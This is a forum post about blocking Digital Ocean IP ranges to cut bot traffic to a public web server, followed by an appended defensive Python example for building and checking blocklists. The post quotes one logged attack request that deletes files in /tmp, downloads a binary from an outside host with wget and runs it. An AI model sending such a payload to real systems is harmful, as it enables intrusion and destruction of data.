Hi All,
I have a web server accessible to the public, which as expected was getting hammered with various bots & script kiddies.
I've set up an IP blocklist for the usual suspects, but I was noticing a lot of malicious traffic from California, Germany, The Netherlands & the UK as well.
Not wanting to block those countries out entirely I decided to dig a little deeper and noticed that many of these addresses had one thing in common: They're coming from Digital Ocean.
Most of these seem to be trying to log into WordPress or bring up other login pages for other services that don't exist on this web server. Others seem to be a little more insidious:
"GET /shell?cd+/tmp;rm+-rf+*;wget+31.210.xx.xxx/jaws;sh+/tmp/jaws HTTP/1.1"
None of these work or do anything on my webserver, but I still don't want them hammering on my system.
Fortunately Digital Ocean publishes a full list of the IP addresses they use: https://digitalocean.com/geo/google.csv
After adding these ranges to my blocklist suddenly my Apache logs are a lot quieter.
Do you filter by country/region or by provider? If so, which IP ranges do you block?
P.S.: I know some BBS hubs are located on VPS providers, you may need to modify these lists if you want to use them so you can still communicate with your hub if they happen to use Digital Ocean. ML looks like he uses OVH so he's safe... ;)
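An added example, not part of the original post: one way to turn a provider's published prefix list into block ranges, carve out a hub address that must stay reachable (the case raised in the P.S.), and check which Apache log entries the result would catch. It assumes the feed's first CSV column is a CIDR prefix; the function names are hypothetical, and the feed rows, log lines and addresses are constructed from documentation ranges.

```python
import csv
import ipaddress
from collections import Counter

# Constructed feed rows (prefix,country,region,city,postal); documentation ranges only.
SAMPLE_FEED = """\
192.0.2.0/24,NL,NL-NH,Amsterdam,
198.51.100.0/25,DE,DE-HE,Frankfurt,
2001:db8:10::/48,US,US-CA,Santa Clara,
"""
# Constructed Apache access-log lines; the client address is the first field.
SAMPLE_LOG = """\
192.0.2.57 - - [01/Jan/2024:00:00:01 +0000] "GET /wp-login.php HTTP/1.1" 404 196
192.0.2.200 - - [01/Jan/2024:00:00:02 +0000] "GET / HTTP/1.1" 200 512
198.51.100.9 - - [01/Jan/2024:00:00:03 +0000] "POST /xmlrpc.php HTTP/1.1" 404 196
203.0.113.4 - - [01/Jan/2024:00:00:04 +0000] "GET /index.html HTTP/1.1" 200 1024
2001:db8:10::1 - - [01/Jan/2024:00:00:05 +0000] "GET /admin HTTP/1.1" 404 196
"""

def load_prefixes(feed_text):
    """Parse column one of each CSV row as a CIDR prefix; skip anything unparsable."""
    nets = []
    for row in csv.reader(feed_text.splitlines()):
        try:
            nets.append(ipaddress.ip_network(row[0].strip(), strict=False))
        except (IndexError, ValueError):
            continue  # blank line, comment or header
    return nets

def carve_out(nets, allow):
    """Remove allowlisted addresses from the ranges, splitting a range where needed."""
    for keep in map(ipaddress.ip_network, allow):
        result = []
        for net in nets:
            if net.version == keep.version and keep.subnet_of(net):
                result.extend(net.address_exclude(keep))
            else:
                result.append(net)
        nets = result
    return nets

def blocked_hits(log_text, nets):
    """Count requests per client address that fall inside a blocked range."""
    hits = Counter()
    for line in log_text.splitlines():
        ip = ipaddress.ip_address(line.split()[0])
        if any(ip in net for net in nets):
            hits[str(ip)] += 1
    return hits
```

Running `blocked_hits` over existing logs before applying the ranges shows which clients a provider-wide block would cut off, including any hub that still needs an entry in `allow`.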